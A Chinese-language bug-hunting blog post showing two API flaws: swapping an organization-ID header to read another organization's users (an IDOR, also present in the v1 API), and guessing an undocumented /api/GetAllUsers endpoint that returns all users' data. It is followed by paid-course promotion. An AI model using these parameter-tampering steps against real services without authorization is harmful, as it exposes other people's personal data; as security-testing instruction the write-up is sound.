API漏洞挖掘

本文详细描述了两个API漏洞案例,涉及IDOR问题和通过改变请求参数暴露敏感数据。作者鼓励读者主动测试并强调了定期学习网络安全的重要性。

API漏洞挖掘2个例子

正文

第一个漏洞:

在浏览bp历史记录以查看各种请求时,发现一个与组织中用户相关的一些信息

  
GET /auth/api/v2/users HTTP/2  
Host: api.redacted.com  
User-Agent:   
Accept: application/json, text/plain, */*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
X-Requested-With: XMLHttpRequest  
X-Csrf-Token: [CSRF_TOKEN]  
Authorization: Bearer [JWT_TOKEN]  
X-Organization-Unit: [ORGANIZATION_ID]  
Sec-Fetch-Dest: empty  
Sec-Fetch-Mode: cors  
Sec-Fetch-Site: same-site  
Te: trailers  

将X-Organization-Unit Header改为另一个Organization id

发现这是一个IDOR问题

后面又将v2改成了v1,发现也出问题了

第二个问题:

  
POST /api/GetUsersById HTTP/2  
Host: api.redacted.com  
Cookie:    
User-Agent:   
Accept: application/json, text/javascript, */*; q=0.01  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/json; charset=utf-8  
X-Csrf-Token:   
X-Requested-With: XMLHttpRequest  
Content-Length:   
Sec-Fetch-Dest: empty  
Sec-Fetch-Mode: cors  
Sec-Fetch-Site: same-origin  
Te: trailers  
  
{Some JSON Post Data To Specify IDs for users}  

这里存粹猜测出另外一个接口:/api/GetAllUsers,惊讶的发现获取到所有用户的信息了!

总结

善于尝试自己主动改变请求中的各个参数,如果响应中有什么报错,那么此时就有可能有漏洞在等着你!

如果你是一个长期主义者,欢迎加入我的知识星球,我们一起往前走,每日都会更新,精细化运营,微信识别二维码付费即可加入,如不满意,72 小时内可在 App 内无条件自助退款

前面有同学问我有没优惠券,这里发放100张100元的优惠券,用完今年不再发放

为了帮助大家更好的学习网络安全,我给大家准备了一份网络安全入门/进阶学习资料,里面的内容都是适合零基础小白的笔记和资料,不懂编程也能听懂、看懂这些资料!

因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

优快云大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

优快云大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值